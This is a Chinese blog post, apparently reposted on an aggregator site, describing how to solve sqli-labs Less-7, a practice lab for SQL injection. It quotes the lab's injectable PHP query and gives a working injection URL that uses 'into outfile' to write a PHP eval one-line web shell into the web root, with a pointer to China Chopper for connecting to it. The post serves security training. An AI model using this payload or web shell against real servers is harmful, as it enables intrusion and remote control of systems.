SQL注入:sqli-labs 7 文件上传漏洞

Posted Zeker62

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入:sqli-labs 7 文件上传漏洞相关的知识,希望对你有一定的参考价值。

  • 经过不断的测试,知道:sql 语句是:SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1(或者你直接代码审计(看答案))
  • 项目提示;You are in… Use outfile…,提示我们使用外部文件,所以这十有八九是一个文件上传漏洞,那如何上传?上传什么文件比较好?
  • 通过代码审计我们知道,这玩意永远都不会报错,因为被注释了:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}
  • 使用命令:into outfile 可以上传文件

  • 使用一句话木马:https://blog.csdn.net/ZripenYe/article/details/119189996新建一个木马文件,使用php为后缀。<?php @eval($_POST['password']);?>

  • 上传文件之前一定要检查自己my.ini配置文件中的secure-file-priv是否是等号后面没有数值,否则上传不了数据

  • 输入命令:http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,"<?php @eval($_REQUEST[777]); ?>",3 into outfile "D:\\\\phpstudy_pro\\\\WWW\\\\sqli\\\\Less-7\\\\2.php" --++++++将文件上传到目录

  • 之后用中国菜刀等工具来访问页面(详情见博客)https://blog.csdn.net/ZripenYe/article/details/119189996

  • 另外,读取文件的操作是load_file() 函数

以上是关于SQL注入:sqli-labs 7 文件上传漏洞的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入漏洞靶场-sqli-labs学习[1-10]

SQL注入漏洞靶场-sqli-labs学习[1-10]

Thinkphp 5.1.7 SQL注入漏洞

SQL注入之sqli-labs等(安装,配置)

SQL注入漏洞靶场实战-1

web安全文件上传漏洞&代码函数&格式后缀&场景